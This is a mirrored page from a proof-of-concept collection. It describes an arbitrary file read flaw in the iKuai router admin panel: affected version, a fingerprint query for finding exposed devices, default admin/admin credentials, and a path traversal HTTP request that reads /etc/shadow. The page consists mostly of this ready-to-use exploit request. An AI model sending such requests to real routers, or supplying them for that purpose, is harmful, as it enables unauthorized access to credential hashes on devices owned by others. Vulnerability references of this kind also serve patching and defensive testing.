admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/iKuai 后台任意文件读取漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

472 B
Raw Blame History

iKuai 后台任意文件读取漏洞

漏洞描述

参考链接:

漏洞影响

影响版本,不一定是绝对版本,也可能其它版本都存在:

3.2.8 x64 Build201910101758

网络测绘

title="登录爱快流控路由"

漏洞复现

默认用户名/密码admin/admin

poc

GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....